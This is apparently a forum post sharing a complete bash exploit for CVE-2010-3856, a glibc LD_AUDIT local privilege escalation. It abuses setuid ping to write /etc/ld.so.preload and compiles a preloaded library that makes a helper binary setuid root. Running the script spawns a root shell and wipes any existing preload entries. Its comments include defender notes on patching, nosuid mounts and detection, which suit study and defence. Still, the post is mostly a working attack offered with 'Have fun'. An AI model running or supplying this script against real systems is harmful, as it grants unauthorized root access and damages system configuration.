Just thought this was worth posting…
#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
#
# Proof-of-concept for a local privilege escalation in the glibc dynamic
# loader. On affected systems LD_AUDIT is honoured for setuid programs, so a
# library from a trusted directory (libpcprofile.so) runs inside a privileged
# process and creates the file named by PCPROFILE_OUTPUT.
#
# Notes for defenders:
#   - Remediation: install the vendor glibc update issued for this CVE.
#   - Hardening: the script depends on a setuid binary it builds in the
#     current directory; mounting user-writable filesystems nosuid stops the
#     kernel from honouring that bit.
#   - Detection: watch for creation or modification of /etc/ld.so.preload,
#     for setuid-root files outside system directories, and for LD_AUDIT set
#     in the environment of setuid executions.
#   - Artifacts: nothing is cleaned up. sh.c, sh, libpwn.c, libpwn.o and
#     libpwn.so stay in the working directory and /etc/ld.so.preload stays on
#     disk (emptied, never removed).

# System-wide preload list read by the dynamic loader.
OUTPUT=/etc/ld.so.preload
# Save the caller's umask, then clear it so the file created by the next
# command has no permission bits masked off.
MASK=`umask`
umask 0
# Run ping with the audit variables set; stderr is discarded.
# NOTE(review): presumably relies on ping being setuid root on the host - confirm.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
# The only vulnerability test is whether the file exists afterwards. A
# pre-existing /etc/ld.so.preload also satisfies it, so the message below is
# not a reliable patch-status indicator. Exit status is 0 in either case.
if [ ! -f $OUTPUT ]; then
echo "System does not appear to be vuln"
exit 0
fi
# Truncate the preload list; any legitimate entries in it are lost here.
echo -n > $OUTPUT
# Restore the umask saved above.
umask $MASK
# Write and compile a helper (sh.c -> ./sh) that sets its uid/gid to its
# effective ids and then executes /bin/bash.
cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv, char **envp) {
char *args[] = { "/bin/bash", NULL };
setuid(geteuid());
setgid(getegid());
execve(args[0], args, envp);
perror("execve failed");
return 0;
}
EOF
gcc sh.c -o sh
# Write and compile a shared object (libpwn.so) that replaces getuid() with a
# function that chowns the helper to uid/gid 0 and sets its setuid bit. The
# heredoc delimiter is unquoted, so $PWD is expanded when the file is written
# and the absolute path of the working directory is embedded in the source.
cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>
uid_t getuid (void) {
chown("$PWD/sh", 0, 0);
chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
# Register the library in the preload list, run ping again so that it is
# loaded into that process, then empty the list.
echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
# Run the helper built above.
./sh
Have fun..